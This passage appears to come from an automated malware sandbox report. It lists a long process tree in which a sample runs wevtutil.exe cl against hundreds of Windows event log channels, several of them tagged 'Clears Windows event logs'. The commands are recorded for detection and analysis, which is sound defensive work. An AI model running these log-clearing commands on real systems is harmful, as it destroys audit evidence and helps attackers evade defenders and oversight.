        wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"
        7⤵
        
        PID:3244
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-IE/Diagnostic"
        7⤵
        
        PID:5968
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
        7⤵
        
        PID:5540
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
        7⤵
        
        PID:5528
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"
        7⤵
        
        PID:5532
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
        7⤵
        
        PID:5504
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
        7⤵
        
        PID:2576
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-Admin/Debug"
        7⤵
        
        PID:5360
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Debug"
        7⤵
        
        PID:3452
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Operational"
        7⤵
        Clears Windows event logs
        
        PID:4880
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Analytic"
        7⤵
        
        PID:2888
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Debug"
        7⤵
        
        PID:4464
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Operational"
        7⤵
        Clears Windows event logs
        
        PID:4736
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-IPC/Operational"
        7⤵
        
        PID:4084
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"
        7⤵
        
        PID:324
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Debug"
        7⤵
        
        PID:2036
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Operational"
        7⤵
        
        PID:3360
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AAD/Analytic"
        7⤵
        
        PID:2296
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AAD/Operational"
        7⤵
        
        PID:1252
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
        7⤵
        
        PID:5376
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ASN1/Operational"
        7⤵
        
        PID:2040
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
        7⤵
        
        PID:5404
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
        7⤵
        
        PID:1556
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
        7⤵
        
        PID:5220
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-All-User-Install-Agent/Admin"
        7⤵
        
        PID:1796
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AllJoyn/Debug"
        7⤵
        
        PID:2172
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AllJoyn/Operational"
        7⤵
        
        PID:4488
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppHost/Admin"
        7⤵
        
        PID:2720
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppHost/ApplicationTracing"
        7⤵
        
        PID:3600
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppHost/Diagnostic"
        7⤵
        
        PID:556
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppHost/Internal"
        7⤵
        
        PID:4572
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
        7⤵
        
        PID:3920
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
        7⤵
        
        PID:1548
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
        7⤵
        
        PID:1416
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Deployment"
        7⤵
        
        PID:5388
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Execution"
        7⤵
        
        PID:4888
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Admin"
        7⤵
        
        PID:4316
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Analytic"
        7⤵
        
        PID:4100
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Debug"
        7⤵
        
        PID:4076
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Diagnostics"
        7⤵
        
        PID:3516
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppModel-State/Debug"
        7⤵
        
        PID:4540
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppModel-State/Diagnostic"
        7⤵
        
        PID:5688
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppReadiness/Admin"
        7⤵
        
        PID:5628
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppReadiness/Debug"
        7⤵
        
        PID:5700
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppReadiness/Operational"
        7⤵
        
        PID:1444
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppSruProv"
        7⤵
        
        PID:5760
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Diagnostic"
        7⤵
        
        PID:2056
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Operational"
        7⤵
        
        PID:5812
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Debug"
        7⤵
        
        PID:5784
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Diagnostic"
        7⤵
        
        PID:5888
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Operational"
        7⤵
        
        PID:1236
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Restricted"
        7⤵
        
        PID:5088
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Analytic"
        7⤵
        
        PID:5860
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Operational"
        7⤵
        
        PID:5848
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
        7⤵
        
        PID:5992
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
        7⤵
        
        PID:5952
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
        7⤵
        
        PID:5908
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
        7⤵
        
        PID:5944
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"
        7⤵
        
        PID:2736
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
        7⤵
        
        PID:288
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"
        7⤵
        
        PID:304
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"
        7⤵
        
        PID:440
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
        7⤵
        
        PID:5920
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
        7⤵
        
        PID:6004
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
        7⤵
        Clears Windows event logs
        
        PID:6032
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Steps-Recorder"
        7⤵
        
        PID:3572
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Debug"
        7⤵
        
        PID:3520
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Operational"
        7⤵
        
        PID:6116
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Performance"
        7⤵
        
        PID:3820
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Admin"
        7⤵
        
        PID:2624
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Operational"
        7⤵
        
        PID:2556
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Admin"
        7⤵
        
        PID:5044
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Operational"
        7⤵
        
        PID:2084
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AsynchronousCausality/Causality"
        7⤵
        
        PID:3096
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
        7⤵
        
        PID:1068
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Audio/GlitchDetection"
        7⤵
        
        PID:2744
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Audio/Informational"
        7⤵
        
        PID:3660
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
        7⤵
        
        PID:6016
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
        7⤵
        
        PID:4296
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Audio/PlaybackManager"
        7⤵
        
        PID:5072
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
        7⤵
        
        PID:3896
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
        7⤵
        
        PID:3952
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"
        7⤵
        Clears Windows event logs
        
        PID:5756
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUser-Client"
        7⤵
        
        PID:5664
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"
        7⤵
        
        PID:2420
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"
        7⤵
        
        PID:4484
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
        7⤵
        
        PID:4952
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/HCI"
        7⤵
        
        PID:5140
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/L2CAP"
        7⤵
        
        PID:2116
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Diagnostic"
        7⤵
        
        PID:4964
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Performance"
        7⤵
        
        PID:1828
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"
        7⤵
        
        PID:4196
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"
        7⤵
        
        PID:2020
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"
        7⤵
        
        PID:3032
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Backup"
        7⤵
        
        PID:5196
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"
        7⤵
        Clears Windows event logs
        
        PID:6128
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"
        7⤵
        
        PID:6048
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Battery/Diagnostic"
        7⤵
        
        PID:4324
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Biometrics/Analytic"
        7⤵
        
        PID:4356
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
        7⤵
        
        PID:2104
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
        7⤵
        
        PID:980
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
        7⤵
        
        PID:4616
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BitLocker-Driver-Performance/Operational"
        7⤵
        
        PID:4124
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Management"
        7⤵
        
        PID:2936
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Operational"
        7⤵
        
        PID:1760
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BitLocker/Tracing"
        7⤵
        
        PID:2356
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
        7⤵
        
        PID:928
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
        7⤵
        
        PID:5236
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"
        7⤵
        
        PID:5248
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Bluetooth-Bthmini/Operational"
        7⤵
        
        PID:5268
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
        7⤵
        Clears Windows event logs
        
        PID:5280
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Bluetooth-Policy/Operational"
        7⤵
        
        PID:4900
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
        7⤵
        
        PID:5332
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
        7⤵
        
        PID:5308
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
        7⤵
        Clears Windows event logs
        
        PID:5336
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BranchCacheMonitoring/Analytic"
        7⤵
        
        PID:5352
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
        7⤵
        
        PID:1116
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
        7⤵
        
        PID:3732
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CAPI2/Catalog Database Debug"
        7⤵
        
        PID:3376
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
        7⤵
        
        PID:4388
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
        7⤵
        
        PID:2808
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
        7⤵
        
        PID:1396
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-COM/ApartmentInitialize"
        7⤵
        
        PID:4580
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-COM/ApartmentUninitialize"
        7⤵
        
        PID:4384
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-COM/Call"
        7⤵
        
        PID:2196
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-COM/CreateInstance"
        7⤵
        
        PID:3052
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-COM/ExtensionCatalog"
        7⤵
        
        PID:5448
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-COM/FreeUnusedLibrary"
        7⤵
        Clears Windows event logs
        
        PID:224
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-COM/RundownInstrumentation"
        7⤵
        
        PID:4628
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-COMRuntime/Activations"
        7⤵
        
        PID:932
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-COMRuntime/MessageProcessing"
        7⤵
        
        PID:116
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
        7⤵
        
        PID:3148
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Calculator/Debug"
        7⤵
        
        PID:3408
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"
        7⤵
        
        PID:3056
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
        7⤵
        
        PID:3764
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
        7⤵
        
        PID:4688
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"
        7⤵
        
        PID:4544
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"
        7⤵
        
        PID:3336
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Cleanmgr/Diagnostic"
        7⤵
        
        PID:1004
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
        7⤵
        
        PID:1976
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CloudRestoreLauncher/Operational"
        7⤵
        
        PID:1812
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CloudStore/Debug"
        7⤵
        
        PID:2520
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CloudStore/Initialization"
        7⤵
        
        PID:5520
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CloudStore/Operational"
        7⤵
        
        PID:5552
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
        7⤵
        
        PID:5508
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
        7⤵
        
        PID:1684
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
        7⤵
        
        PID:2032
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
        7⤵
        
        PID:3784
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
        7⤵
        
        PID:4756
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Analytic"
        7⤵
        
        PID:3744
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Operational"
        7⤵
        
        PID:5104
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Debug"
        7⤵
        
        PID:3480
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Operational"
        7⤵
        
        PID:4184
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Debug"
        7⤵
        
        PID:1944
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Operational"
        7⤵
        
        PID:2984
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Debug"
        7⤵
        
        PID:4740
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Operational"
        7⤵
        
        PID:4604
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CoreApplication/Diagnostic"
        7⤵
        
        PID:3080
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CoreApplication/Operational"
        7⤵
        
        PID:5368
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CoreApplication/Tracing"
        7⤵
        
        PID:4524
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"
        7⤵
        
        PID:5468
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"
        7⤵
        
        PID:5444
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CoreWindow/Analytic"
        7⤵
        
        PID:832
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CoreWindow/Debug"
        7⤵
        
        PID:2612
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
        7⤵
        
        PID:1032
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
        7⤵
        
        PID:4508
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Crashdump/Operational"
        7⤵
        
        PID:3772
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
        7⤵
        
        PID:1232
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Crypto-BCRYPT/Analytic"
        7⤵
        
        PID:4968
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Crypto-CNG/Analytic"
        7⤵
        
        PID:4568
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"
        7⤵
        
        PID:1640
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Debug"
        7⤵
        
        PID:3324
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Operational"
        7⤵
        
        PID:5548
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Crypto-DSSEnh/Analytic"
        7⤵
        
        PID:1124
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Crypto-NCrypt/Operational"
        7⤵
        
        PID:2764
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
        7⤵
        
        PID:5640
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Crypto-RSAEnh/Analytic"
        7⤵
        
        PID:1612
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
        7⤵
        
        PID:4404
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
        7⤵
        
        PID:4876
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Analytic"
        7⤵
        
        PID:1212
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Operational"
        7⤵
        
        PID:2068
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DAMM/Diagnostic"
        7⤵
        
        PID:1616
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
        7⤵
        
        PID:5660
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DDisplay/Analytic"
        7⤵
        
        PID:2044
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DDisplay/Logging"
        7⤵
        
        PID:4836
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DLNA-Namespace/Analytic"
        7⤵
        
        PID:5800
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
        7⤵
        
        PID:5804
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DSC/Admin"
        7⤵
        
        PID:5788
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DSC/Analytic"
        7⤵
        
        PID:5896
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DSC/Debug"
        7⤵
        
        PID:5940
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DSC/Operational"
        7⤵
        
        PID:3712
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
        7⤵
        
        PID:1220
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
        7⤵
        
        PID:5956
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
        7⤵
        
        PID:1248
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
        7⤵
        
        PID:5836
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
        7⤵
        
        PID:5916
        
        C:\Windows\system32\wevtutil.exe
        
